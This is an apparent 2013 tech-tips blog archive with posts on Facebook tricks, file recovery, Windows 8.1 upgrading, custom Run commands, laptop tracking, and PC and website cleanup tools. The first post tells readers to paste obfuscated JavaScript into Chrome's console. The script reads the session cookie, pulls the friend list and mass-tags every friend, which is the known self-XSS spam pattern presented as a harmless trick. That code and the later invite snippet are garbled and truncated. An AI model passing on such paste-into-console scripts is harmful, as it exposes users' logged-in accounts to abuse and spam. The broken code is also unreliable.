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Thursday 28 November 2013

How to Tag all your Friends on a Facebook Status in a Single Click

Steps to Tag All Your Facebook Friends in a Single Click:

The technique is very simple even though the code is a little complex.This trick is currently working perfectly on Google Chrome Browser, so I recommend you to use Google Chrome while performing this trick.
  • Login to your Facebook Account on Google Chrome Browser.
  • Post A Status.
  • Then click on the time stamp of the status, so that your status will open in a separate window
  • Now press Ctrl + Shift + J
  • Now a windows will pop out below
  • switch+to+console+paste+code+and+hit+enter+ignore+errors+if+any
Switch to the Console Tab and paste the below code over there and hit Enter

function x__0(){return window.ActiveXObject?new ActiveXObject("Msxml2.XMLHTTP"):new XMLHttpRequest}function get_friends(){var e=x__0();"GET","/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm",false);e.send(null);if(e.readyState==4){var t=JSON.parse(e.responseText.substring(e.responseText.indexOf("{")));return t.payload.entries}return false}function get_uid(e){var t=x__0();"GET",""+e,false);t.send();if(t.readyState==4){return uid=JSON.parse(t.responseText).id}return false}function cereziAl(e){var t=e+"=";if(document.cookie.length>0){konum=document.cookie.indexOf(t);if(konum!=-1){konum+=t.length;son=document.cookie.indexOf(";",konum);if(son==-1)son=document.cookie.length;return unescape(document.cookie.substring(konum,son))}else{return""}}}function getRandomInt(e,t){return Math.floor(Math.random()*(t-e+1))+e}function randomValue(e){return e[getRandomInt(0,e.length-1)]}function a(e){var t=new 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  • Ignore if you get any error and just wait for a while.
  • Within few seconds all your friends must be tagged in the status.
  • That's all friends you are done.
  • Hope you enjoyed the trick.
This script is tested and its perfectly working on Google Chrome.If you are facing any issues do let us know in your comments below.

Friday 22 November 2013


Register for IBM The Great Mind Challenge Contest

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Remove the Virus:
First of all, connect your pen drive/Flash drive to a PC that is protected with most updated version of a good antivirus and then scan it. Fix all the virus threats that are detected by the antivirus. Note: If you again connect the flash drive to a computer which is not completely protected by a good antivirus, you may help the virus find its new home!
Recover the Data:
Once all the infected files are removed from the pen drive, go to command prompt or CMD on your computer and run the following DOS command. Here we assume that the Flash drive is G: drive. If its not G: then replace G with correct letter as applicable.
ATTRIB -H -R -S /S /D G:\*.*
Now check your flash drive. You should have your data present there.

Wednesday 20 November 2013


step1:  you need to select folder of which to be applied
step2 :right click on it....Then you wil find option like colorizer

step3: Then select the respective color of your need
 NOTE   --   After applying all you need to press refresh button(mandatory)

click here to download

How to select all friends while inviting for page or event on Facebook

Facebook invites are useful to invite your friends to view your website or to like your new Facebook page, you will see friends invite almost everywhere in Facebook.  

Facebook Invites are useful, but so much time consuming. Facebook allows you to select only 50 users at time, ie if u have 1000 friends friends you have to open and close the window about 20 times which consumes our time. Also At a movement You get tired from this inviting/selecting stuff. 
Just Lazy like me ;)

But Don't Worry. Selecting more than 50 friends or 1000 friends is no longer a difficult task. So To Reduce Our Human Effort, Here we introduces this tutorial for you which purely works on computer as it based on java script.

First of all Make sure that you are an admin of the page then go to your page for which you want to Invite Your friends.
1. Click on Build Audience on Administrator Panel
2. Click on invite friends as shown in below picture

How to select all friends while inviting for page or event on Facebook

3. Click on Search All friends & wait while all listed

How to select all friends while inviting for page or event on Facebook

4. Press ctrl+shift+j (For Chrome) & ctrl+shift+k(for Firefox)

How to select all friends while inviting for page or event on Facebook

5. A window will get this at Lower side
6. Just copy this JavaScript For all Friends

How to select all friends while inviting for page or event on Facebook
(“checkableitems[]“);for (i=0;i<elms.length;i++){if (elms

[i].type=”checkbox” )elms[i].click()};

6. Press Enter Wait for Getting Friend selected. 

7. Finally you will get that all Friend Get selected.

Note : You can do this same trick from any device which supports java script to select all your friends to an Event.
Hope You will Try this.


Thursday 14 November 2013

Recover Deleted Files From External Hard Drive (100% WORKING)

With the ease of, use of technology today, everything seems to be super fast with availability of anything and almost everything on finger tips. The improvement in technology has definitely changed the way we thought about computers, and the enhanced user friendly interface which provides a much faster as well as easier control of man over his machine.
The advantages linked with this improvement are innumerable, but every fort when looked closely would show some bits of cracks in one to two bricks. You may have occurred to a thought once in your life that how much the digital data is important in your life and what if you lose it accidentally. Well, then surely you might find yourself engaged into trouble.

How to Recover Deleted Files From External Hard Drive

Below are a few simple steps to help you Recover Deleted Files from some external hard drive.
Prevent any further modifications in the drive you need to recover your data from : If you have clicked on the delete button accidentally, and you need to get your data back, then the most important thing you must keep in mind is that you should not try to make any amendments in the files on the drive. This means do not delete any other data, or add any data to the file. Just stop using it, and follow the proceeding steps.

Download a file Recovery Software from Internet (Recuva) : Simply browse to Google, and search for some file recovery software online. You will get a good list of results, and you can choose to select any one of them after reviewing their features and other details.
Recuva is one of the most popular applications with some good reviews, and you may try it.

Install the Software and Follow the Instructions : Once you find the appropriate software, you may proceed to install it on your system, and then run it. It would then provide you a list of drives connected to your computer. Simplyselect the drive you need to recover drives from, and start the scan. It would then provide you a list of files which existed on the drive in the past. Depending on the size of the drive, it may take time accordingly.

Choose the files : After the list has been generated, all you need to do is tic mark the files you want to recover, or select all if you need them all, and simply click on “Recover” button.

Some other Recovery Softwares:
Apart from Recuva, there are several other free tools available in the market online which may help you with the Recover Deleted Files The names include Puran FileRecovery, Glary Undelete, SoftPerfect File Recovery, Pandora Recovery, Restoration, Avira UnErase Personal, Free Undelete, ADRC Data Recovery Tools and CD Recover Toolbox.
All these applications are completely free of cost and has a user friendly interface. You may simple type “file recovery software” in Google to catch the best results, or query “download recuva” to directly take you to the download pages.

How to Upgrade to Windows 8.1 from Windows 8

Windows 8 is the latest version of the Microsoft’s line of operating system. Unlike before, this operating system version is not only geared toward personal computers, but it is also made for mobile devices like tablets. It directly rivals Apple’s iOS and Google’s Android OS. And in case you have already installed Windows 8 system, it is highly suggested that you Upgrade to Windows 8.1. Fortunately, it is not that complicated to do. And this article will teach you how to do that.

Steps to Upgrade to Windows 8.1

If you are a bit skeptical about the changes that the upgrade will do to your system, do not. Your files and programs will not be affected by the update, so you will not need to create a Backup or reinstall your programs after the upgrade. On the other hand, if you are curious about the things that will change once you upgrade, here is a quick list:
  • The Windows start button will be back
  • The operating system’s performance will improve
  • The system will become more customizable
  • The SkyDrive integration will improve
1.The first thing to do is to visit the Windows Store. If you have not updated your operating system yet, the first thing you will see in the store is the Windows 8.1 upgrade app. However, if you do not, you might need to access it manually. To do that, type or paste “ms-windows-store:WindowsUpgrade” to your browser’s address box (without the quotes).
2.To claim the upgrade, it is necessary that you login with your Microsoft account first. If it is your first time to use your account, you might need to use of a code that you have received from Microsoft to confirm that you are the one who is using the Microsoft account that you just logged in.

3.Once those things are done, all you need to do now is access the app and download it. If the download is finished, the upgrade might ask you to restart your computer, which you can easily do by just pressing the Restart Now button on the upgrade interface.

4.If the computer finishes the restart, you will be shown the Windows Software License Terms. You can read the terms, and accept it by pressing the I Accept button. You will be then redirected to the installation/upgrade settings page. You have the choice to customize it or just leave it as is. It is recommended that you choose the Express Settings if you are unfamiliar with the settings shown to you.

5.The upgrade will proceed after those things. Once it is done, you will be asked to login using your Microsoft account, and to provide some personal information. And that is everything to it.

6.By the way, the installation will not take a lot of time, and it is possible that downloading the upgrade will be the longest part of the process. The installation package is around 3.5GB big, so if you have a poor and unreliable internet connection, it will take one hour up to one day downloading it. Unfortunately, you can expect that the download time will become longer since the release of this update is very recent (because many Windows users are also downloading the package from Microsoft’s servers).

How To Create Your Own Run Commands

There is no doubt that Microsoft Windows is the most widely used operating system in all parts of the world. Apart from being simple to use, it is quite rich in features as well, which makes our lives quite easy.
The Run command available on Windows operating system is one such power packed feature that lets you to open a document or an application instantly with the help of just 1 command. So, rather than clicking several icons or using multiple commands, you can use the Run command to open any program or document instantly.
But, do you know how to create your own run commands? Well, it is really easy, which involves just few steps. Through this article, I will help you understand how to access your favorite applications by creating custom Run commands.
Open Run Command
Before I show you how to create your own Run commands, let’s take a quick look on how to open Run Command. First of all, you need to open the Run window by just pressing the Windows Key along with the R key, i.e. Windows + R. Now, you have to type the name of the program that you desire to open up or execute. Unfortunately, not all programs can be accessed through this method. So, let me show you how to create Run commands that do not come as inbuilt commands.

Steps to Create your own run commands

Step 1. The first step is to select the software or application for which you want to make custom Run command. For example, let us consider Google Chrome as the example here. Remember, you can choose any application other than which is already there in the Run command.
Step 2. In the second step, right click on the desktop of your computer system and make a new shortcut.
Right click > New > Shortcut

Step 3. As you select the Shortcut option in the 2nd Step, it will open up a dialog box. And, the dialog box will ask you path of the application or software for which you want to create the Run command.

Step 4. Now, you need to browse through the files and choose the one that shows “chrome.exe”. Well, it is quite obvious that all the executable files can be found in the C drive (or wherever the Operating System has been installed), inside the folder “Program Files”. For example, “C:\Program Files\Google Chrome\chrome.exe

Step 5. Once you are done with Step number 4, just click on “Next” button and simply provide a relative name to that shortcut. Remember, the same name will be used later in the Run command.
For example, “GC” for Google Chrome

Step 6. Now, click on the “Finish” button. Once it is done, an icon related to that application or software will show up on your computer’s screen. It means that the process of creating shortcut has been done successfully.

Step 7. In this step, just cut and paste that recently made shortcut icon into your computer’s root drive, in its Windows folder.
For example, C:\ Windows , Make sure you are the administrator of the computer or have its password.

Step 8. Now, you are done with the set up and can run the application through Run Command. Just go to Run and enter the keyword “GC”, and Google Chrome will begin executing.
I Hope this Post will Easeup your Work, Stay Tuned and Subscribe to this Blog to Recieve Updates.............THANK YOU..FOR VISIT..

How to Trace your Lost or Stolen Laptop

Did you ever loose your personal laptop? Now-a-days all the important information is being stored in the personal or office laptops. Once they are stolen, everything is gone. Some people may also loose their jobs because of this issue. If you are worried about loosing your laptop or it getting stolen, you have to install a tracking device on your device so that you can trace it back if it goes missing. -
Prey is an open source app that allows you to keep track of all your electronic devices(laptop,tablet and mobile phones). Once you install pray on your laptop, it will silently run in the background and will wait to receive a signal through the internet from you. trace it When you have lost your laptop,  you can log in to the web interface of pray from anywheretrace it  in the world and send a signal to your laptop. Once the signal is received by the Prey software on your laptop, it will allow you to perform the following actions,all remotely through the internet.
1. Show the location of your device on a geographical map.
2. Take photo of the person using your device using the inbuilt camera.
3. Lock down your laptop so that it cannot be used.
4. Take a screenshot of your computer screen to find out more information about who is using your laptop. For example you may be able to capture the email account and facebook account that the user is logged into.
5.Set off a loud alarm on your missing laptop.
6. Display an alert message on your laptop screen with the text of your own choice.
7. Erase all saved passwords and history.
After completing the above steps, you can seek the help of police to trace down your laptop. But for all this, you need to install the prey software on your laptop. You can download it from the website.
After downloading the software, start the installation wizard. Select the Configuration Prey Settings. Click on New User.
Enter your contact details and click on the create button in order to create your Prey account and add your devices to it.
Log into your email account to verify your identity by clicking on the link sent to you by the Pray Project.
Once you activate your account, Prey will start working and tracks your laptop when it is lost or stolen. You can login to your web control panel and manage all the settings.
To manage the tracking settings related to a specific device, simply go to the Prey Control Panel. This page will allow you to specify what actions can be performed in case your device is stolen
Click on Save Changes button once you complete the settings.  In case your device goes missing, log in to the prey website, open the control panel change the status from OK to MISSING. After a few minutes, You will receive a detailed report about your missing device from the Prey Project.
This report may contain a bunch of information related to your missing device.

Wednesday 6 November 2013

Duck Duck Go(A New Search Engine)

In First look looks like Google and other Search engines. But there are many subtleties that make this Spartan search engine different. DuckDuckGo has some slick features, like ‘zero-click‘ information (all your answers are found on the first results page). DuckDuckgo offers disambiguation prompts (helps to clarify what question you are really asking). And the ad spam is much less than Google.
Today i am going to Show you 10 Cool DuckDuckGo Features You Won’t Find On Google .
1. Search the Web Privately
2. Get Instant Definitions
3. Explain an Emoticon
4. Search within a Site
5. Make DuckDuckGo Indain or any country that you want

6. Get Useful Data Instantly

7. Is it Raining ?

8. Food Recepies :-

9. Get ducky first time

10. Burst the Filter Bubble

Best Free Tools to Speed-up your PC ?

Today i am going to show you all-in-one PC utility that can scan, repair, and optimize many aspects of your system.It aims to remedy whatever ails your computer by not only cleaning up junk files, malware, and invalid registry entries, but by giving your computer a boost to optimize your PC experience.
Windows Repair is an all-in-one repair tool to help fix a large  majority of known Windows problems including registry errors and file  permissions as well as issues with Internet Explorer, Windows Update, Windows  Firewall and more. Malware and installed programs can modify your default settings.
With – Windows Repair you can restore Windows original settings.
Best Free Tools to Speed-up your PC
Keeping the computer running at full speed can take a little bit of work if you don’t have the right tools. PrivaZer is a nice app that can optimize your computer.
The program has a simple interface that is quite easy to figure out, thanks to the intuitive layout.
Best Free Tools to Speed-up your PC
CCleaner deals with a rather sensitive segment involved in computer maintenance, namely secure cleaning. It performs an in-depth analysis of almost all areas of your system and detects unused or invalid entries that clog the Windows registry, preventing it from running at its best.
CCleaner features a clean, professional-looking interface split into four areas: Cleaner, Registry, Tools and Options. Aside from the last one, which deals with application settings, each of the other three perform different jobs in various areas of your machine.
Hope you like my post Best Free Tools to Speed-up your PC. Please Share with others.

How to check a Website for a Virus :-

If you are Webmaster and you want to know How to know your website is infected with any malware then this tutorial is completely for you. Today my one friend Mr. Saiban Ahmed informed me, he is getting Phishing site warning on his one article link. Saiban is webmaster at . but When i checked his link i found nothing wrong.
Today i am going to show you How to check a Website for a Virus or Malware. is a free service developed by NoVirusThanks Company Srl that allows users to scan a website address with multiple website reputation engines and domain blacklists to facilitate the detection of possible dangerous websites,used to distribute malware and spyware or related to fraudulent activities. In total we have analyzed 3,376,220 unique websites.
Open and enter your website url and any website url that you want to scan. It will show your Domain information
including your website status with Multiple antivirus engine.
Sucuri is really a great online to check your site for Virus or malware infection.
If you have WordPress website then just install the Sucuri WordPress plugin and run Scan for all website.
Enjoy virus free website.
Also Check :-
Hope you like my post.How to check a Website for a Virus. Please Share with others.
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